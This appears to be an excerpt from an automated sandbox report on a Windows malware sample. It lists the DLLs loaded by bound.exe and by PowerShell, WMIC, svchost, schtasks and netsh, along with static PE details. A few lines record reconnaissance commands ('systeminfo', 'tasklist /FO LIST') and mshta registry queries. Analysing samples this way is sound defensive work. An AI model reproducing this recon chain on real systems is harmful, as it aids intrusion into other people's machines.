                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sxs.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: scrrun.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: linkinfo.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntshrui.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: avicap32.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: msvfw32.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: word.lnk.15.drLNK file: ..\..\..\..\..\word.exe
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: sB2ClgrGng.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: sB2ClgrGng.exeStatic file information: File size 7962066 > 1048576
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: sB2ClgrGng.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
